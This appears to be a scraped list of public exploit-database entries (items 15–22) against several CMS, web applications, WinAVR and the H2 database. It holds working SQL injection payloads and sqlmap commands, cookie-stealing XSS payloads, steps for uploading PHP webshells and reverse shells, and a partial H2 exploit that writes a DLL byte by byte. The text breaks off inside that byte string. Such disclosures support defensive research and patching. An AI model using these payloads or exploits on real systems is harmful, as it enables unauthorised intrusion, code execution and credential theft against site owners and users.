  15. # Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi # Date: 07.12.2020 # Exploit Author: MoeAlbarbari # Vendor Homepage: https://ipeak.ch/ # Software Link: N/A # Version: 3.5 # Tested on: BackBox Linux # CVE : CVE-2021-3018 Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1 Parameter: id (GET based) Use SQLmap if you've found the valid id... e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))
  16. # Exploit Title: Responsive E-Learning System 1.0 – Stored Cross Site Scripting # Date: 2020-12-24 # Exploit Author: Kshitiz Raj(manitorpotterk) # Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Step 1- Go to url http://localhost/elearning/admin/index.php Step 2 – Login as admin. Step 3 – Go to http://localhost/elearning/admin/course.php Step 4 – click on Edit course (any course) Step 5 – Enter *Course Year And Section:* as <script>alert()</script> and fill the other values. Step 6 – Click Save XSS popup will be triggered.
  17. # Exploit Title: WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting # Date: 2021-01-03 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Vendor Homepage: https://wordpress.org/plugins/wp24-domain-check/ # Software Link: https://wordpress.org/plugins/wp24-domain-check/ # Version: 1.6.2 # Tested on: Apache2 - Windows 10 Vulnerable param: wp24_domaincheck[fieldnameDomain] ------------------------------------------------------------------------- POST /w12ee3/wp-admin/options.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced Content-Type: application/x-www-form-urlencoded Content-Length: 415 Origin: http://localhost Connection: close Cookie: wordpress_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C9bd3e4806dbb6058ca887771af1d82b5d04ad6c3d14f8f6f88d9604ad12ae500; wordpress_logged_in_a25e758b4b8611d32cffab04f654ade8=admin%7C1610108483%7C9JXQJh8k8MPmNowV0sLR7zP5q0hyjw2rpi8fp0wdZNa%7C8edadaf3ba084ba1d6cb6257a460f043efde74e8bcd9817826faf9ad80271d1e; wp-settings-time-1=1609659595; bp_user-role=administrator; bp_user-registered=1608898152000; bp_ut_session=%7B-q-pageviews-q-%3A1-c--q-referrer-q-%3A-q--q--c--q-landingPage-q-%3A-q-http%3A%2F%2Flocalhost%2Fw12ee3%2F-q--c--q-started-q-%3A1609657029216%7D Upgrade-Insecure-Requests: 1 update_advanced_settings=1&option_page=wp24_domaincheck&action=update&_wpnonce=8dcf91df50&_wp_http_referer=/w12ee3/wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced&wp24_domaincheck%5BhtmlForm%5D=1&wp24_domaincheck[fieldnameDomain]=111%22+onfocus%3Dalert%28document.cookie%29%3B+on%3D&wp24_domaincheck%5BfieldnameTld%5D=domaincheck_tld&submit=De%C4%9Fi%C5%9Fiklikleri+kaydet Source Code: \wp-content\plugins\wp24-domain-check\includes\class-wp24-settings.php: -------------------------------------------------------------------- // fieldnameDomain add_settings_field( 'fieldnameDomain', __( 'Domain fieldname', 'wp24-domaincheck' ), array( $this, 'inputfield' ), 'settings_advanced', 'section_advanced_form', array( 'name' => 'fieldnameDomain', 'type' => 'textfield', ) ); Vulnerable: 'name' => 'fieldnameDomain' ------------------------------------------------------------------------- Payload: 111" onfocus=alert(document.cookie); on= -------------------------------------------------------------------------
  18. # Exploit Title: Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE # Date: 2020-12-24 # Exploit Author: Kshitiz Raj (manitorpotterk) # Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux Step 1 - Login to the application with admin credentials. Step 2 - Click on Student or go to http://localhost/elearning/admin/student.php Step 3 - Click on Add Student and fill the required things. Step 4 - In image upload any php reverse shell. Step 5 - Visit "http://localhost/elearning/admin/uploads/" and select your uploaded PHP web shell.
  19. # Exploit Title: Newgen Correspondence Management System (corms) eGov 12.0 - IDOR # Date: 29 Dec 2020 # Exploit Author: ALI AL SINAN # Vendor Homepage: https://newgensoft.com # Software Link: https://newgensoft.com/solutions/industries/government/e-gov-office/ # Version: eGov 12.0 # Tested on: JBoss EAP 7 # CVE : CVE-2020-35737 ----------------------------------------------------- Description: Correspondence management is the process of handling official incoming and outgoing correspondence in government agencies. The word “correspondence” in this context refers to physical letters, direct e-delivery, emails and faxes along with all their attachments that are received by the government agencies. ----------------------------------------------------- Vulnerability: Affected URL: http://server/corms/dist/#/web/home/workdesk/inbox Vulnerability Description: user can manipulate parameter “UserIndex” in personal setting page. this parameter can allow un-authorized access to view or change other user's personal information.
  20. # Exploit Title: WinAVR Version 20100110 - Insecure Folder Permissions # Date: 2020-12-11 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://sourceforge.net/projects/winavr/ # Software Link: https://sourceforge.net/projects/winavr/files/WinAVR/20100110/WinAVR-20100110-install.exe # Version: Version 20100110 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info: PS C:\WinAVR-20100110\bin> icacls.exe . . BUILTIN\Administrators:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) Successfully processed 1 files; Failed processing 0 files PS C:\WinAVR-20100110\bin> icacls.exe *.dll cygwin1.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) itcl32.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) itk32.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) libusb0.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) tcl84.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) tclpip84.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) tk84.dll BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) Successfully processed 7 files; Failed processing 0 files PS C:\WinAVR-20100110\bin> icacls.exe *.exe avarice.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-addr2line.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-ar.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-as.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-c++.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-c++filt.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-cpp.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-g++.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-gcc-4.3.3.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-gcc.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-gcov.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-gdb.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-gprof.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-insight.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-ld.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-nm.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-objcopy.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-objdump.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-ranlib.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-readelf.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-size.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-strings.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr-strip.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-addr2line.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-ar.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-as.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-c++.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-c++filt.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-cpp.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-g++.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-gcc-4.3.2.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-gcc.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-gcov.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-gdb.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-gprof.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-insight.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-ld.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-nm.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-objcopy.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-objdump.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-ranlib.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-readelf.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-size.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-strings.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avr32-strip.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) avrdude.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) loaddrv.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) simulavr.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) splint.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) srec_cat.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) srec_cmp.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) srec_info.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) tclsh84.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) wish84.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) Successfully processed 54 files; Failed processing 0 files PS C:\WinAVR-20100110\bin> # Exploit: This vulnerability could permit executing code with the escalated privileges by hijacking one of the DLLs or *.exe files.
  21. # Exploit Title: Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated) # Date: 3/1/2021 # Exploit Author: Arnav Tripathy # Vendor Homepage: https://egavilanmedia.com # Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/ # Version: 1.0 # Tested on: linux/lamp Submit rce.php in resume file upload unauthenticated. Contents of rce.php <?php $output = shell_exec('whoami'); echo "<h1>$output</h1>"; ?> Navigate to http://localhost/Resumes Management and Job Application Website/files/rce.php You will get the output of whoami
  22. # Exploit Title: H2 Database 1.4.199 - JNI Code Execution # Exploit Author: 1F98D # Original Author: Markus Wulftange # Date: 28 April 2020 # Vendor Hompage: https://www.h2database.com/ # Tested on: Windows 10 x64, Java 1.8, H2 1.4.199 # References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html # H2 allows users to gain code execution by compiling and running Java code # however this requires the Java Compiler to be available on the machine running H2. # This exploit utilises the Java Native Interface to load a a Java class without # needing to use the Java Compiler -- Write native library SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x1f),CHAR(0xba),CHAR(0x0e),CHAR(0x00),CHAR(0xb4),CHAR(0x09),CHAR(0xcd),CHAR(0x21),CHAR(0xb8),CHAR(0x01),CHAR(0x4c),CHAR(0xcd),CHAR(0x21),CHAR(0x54),CHAR(0x68),CHAR(0x69),CHAR(0x73),CHAR(0x20),CHAR(0x70),CHAR(0x72),CHAR(0x6f),CHAR(0x67),CHAR(0x72),CHAR(0x61),CHAR(0x6d),CHAR(0x20),CHAR(0x63),CHAR(0x61),CHAR(0x6e),CHAR(0x6e),CHAR(0x6f),CHAR(0x74),CHAR(0x20),CHAR(0x62),CHAR(0x65),CHAR(0x20),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x20),CHAR(0x69),CHAR(0x6e),CHAR(0x20),CHAR(0x44),CHAR(0x4f),CHAR(0x53),CHAR(0x20),CHAR(0x6d),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x2e),CHAR(0x0d),CHAR(0x0d),CHAR(0x0a),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4e),CHAR(0xb0),CHAR(0xdb),CHAR(0x83),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x03),CHAR(0xa9),CHAR(0x26),CHAR(0xd0),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb4),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x51),CHAR(0xb9),CHAR(0xb4),CHAR(0xd1),CHAR(0x09),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb4),CHAR(0xd0),CHAR(0x28),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb0),CHAR(0xd1),CHAR(0x01),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x02),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb6),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb5),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb7),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x52),CHAR(0x69),CHAR(0x63),CHAR(0x68),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x64),CHAR(0x86),CHAR(0x05),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x20),CHAR(0x0b),CHAR(0x02),CHAR(0x0e),CHAR(0x19),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x60),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x34),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x35),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x0e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x2e)